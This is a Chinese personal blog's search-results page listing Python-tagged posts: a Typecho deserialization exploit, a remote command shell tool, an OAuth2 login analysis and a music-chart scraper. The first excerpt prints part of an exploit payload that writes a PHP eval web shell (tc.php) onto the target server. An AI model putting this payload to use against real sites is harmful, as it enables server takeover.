TypechoJoeTheme

K.Fire's Blog

K.Fire

没有勇敢的工作
只有困难的打工人
网站页面
搜索到 9 篇与 Python 的结果
2019-02-01

Typecho 反序列化漏洞POC

Typecho 反序列化漏洞POC
Typecho 版本https://github.com/typecho/typecho/releases/tag/v1.1-15.5.12-beta构造Payload<?php class Typecho_Feed{ private $_type = 'ATOM 1.0'; private $_charset = 'UTF-8'; private $_lang = 'zh'; private $_items = array(); public function addItem(array $item){ $this->_items[] = $item; } } class Typecho_Request{ private $_params = array('screenName'=>'file_put_contents(\'tc.php\', \'<?php @eval($_POST[tc]);?>\')'); private $_filter = array('a...
K.Fire
2019-02-01

分享

76 阅读
0 评论
2019年02月01日
76 阅读
0 评论
2018-09-26

基于python的简单shell,可执行命令、上传文件

基于python的简单shell,可执行命令、上传文件
食用截图食用说明工具基于python 3.7。所需库(socket threading subprocess)仅有执行命令,上传文件功能,当然有能力可以自己添加。此代码不会长期维护,当然逻辑也不会很复杂。option中仅提供command和upfile两种选择。ps:存在命令执行部分乱码,才疏学浅,希望能解决。Github:已失效
K.Fire
2018-09-26

工具,源码

69 阅读
0 评论
2018年09月26日
69 阅读
0 评论
2018-07-05

详细分析某个Oauth2认证过程&Python实现

详细分析某个Oauth2认证过程&Python实现
OAuth2.0是OAuth协议的延续版本,但不向后兼容OAuth 1.0即完全废止了OAuth1.0。 OAuth 2.0关注客户端开发者的简易性。要么通过组织在资源拥有者和HTTP服务商之间的被批准的交互动作代表用户,要么允许第三方应用代表用户获得访问的权限。同时为Web应用,桌面应用和手机,和起居室设备提供专门的认证流程。2012年10月,OAuth 2.0协议正式发布为RFC 6749工具&环境FiddlerPython 3.7流程分析完整抓取登陆流程使用fidder抓取整个登陆过程;检查用户名,密码是否正确首先我们来看第2个请求:我们首先get /eams/login.action ,然后给出了一个 307 重定向 :在返回头信息里,我们可以发现存在一个location 参数。这个location是有用处的,所以我们记下它。之后会被重定向到location中那个链接,注意其中的client_id参数python实现代码:firstheaders={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60...
K.Fire
2018-07-05

笔记

67 阅读
0 评论
2018年07月05日
67 阅读
0 评论
2018-06-08

网易云音乐热歌榜爬虫

网易云音乐热歌榜爬虫
爬虫将会生成一个html文件,用以保存歌曲及链接运行实例爬虫代码#python3 s0s.cc import requests import re def main(): data1=re.findall('<li><a href=\"(.*?)</li>',ret2) data4='<html><head><title>云音乐热歌榜 - 排行榜 - 网易云音乐</title><body>' for data2 in data1: data3='<li><a href="https://music.163.com/#'+data2+'</li>' data4=data4 + data3 html=data4 +'</body></html>' savefile=open('D:/hotmusic.html','wb+') savefil...
K.Fire
2018-06-08

源码

84 阅读
0 评论
2018年06月08日
84 阅读
0 评论